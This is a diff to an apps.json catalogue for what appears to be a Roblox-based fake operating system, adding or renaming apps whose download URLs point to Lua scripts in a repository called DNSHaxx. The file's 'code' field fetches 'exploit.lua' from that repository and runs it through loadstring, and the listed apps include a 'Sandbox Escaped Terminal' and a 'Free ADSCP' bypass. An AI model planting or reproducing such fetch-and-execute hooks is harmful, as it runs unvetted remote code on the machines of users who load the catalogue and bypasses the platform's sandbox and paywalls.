--- a/apps.json
+++ b/apps.json
@@ -3,11 +3,39 @@
   "code": "local HttpService = GetService('HttpService'); local loadstring = loadlib('loadstring'); local haxx = getfenv(loadstring).myEnv; local code = HttpService:GetAsync('https://raw.githubusercontent.com/XG213/DNSHaxx/main/exploit.lua'); loadstring(code, haxx)()",
   "apps": [
     {
-      "name": "Run me!",
+      "name": "Sandbox Escaped Terminal",
       "developerName": "Byte",
       "version": "0.1",
       "downloadURL": "https://raw.githubusercontent.com/XG213/DNSHaxx/main/clientexploit.lua",
       "description": "Hi :3",
+      "iconID": "0",
+      "dateAdded": "iForgor💀",
+      "genre": "other",
+      "compatibility": "false",
+      "banned": "false",
+      "openSource": "false",
+      "startMenuEntry": "false"
+    },
+    {
+      "name": "Free ADSCP",
+      "developerName": "Byte",
+      "version": "0.1",
+      "downloadURL": "https://raw.githubusercontent.com/XG213/DNSHaxx/main/freeadscp.lua",
+      "description": "To open ADSCP: open a terminal then type 'ADSCP' and press enter",
+      "iconID": "0",
+      "dateAdded": "iForgor💀",
+      "genre": "other",
+      "compatibility": "false",
+      "banned": "false",
+      "openSource": "false",
+      "startMenuEntry": "false"
+    },
+    {
+      "name": "DNS reverter",
+      "developerName": "Byte",
+      "version": "0.1",
+      "downloadURL": "https://raw.githubusercontent.com/XG213/DNSHaxx/main/dnsrevert.lua",
+      "description": "Reverts back to LimeOS dns",
       "iconID": "0",
       "dateAdded": "iForgor💀",
       "genre": "other",
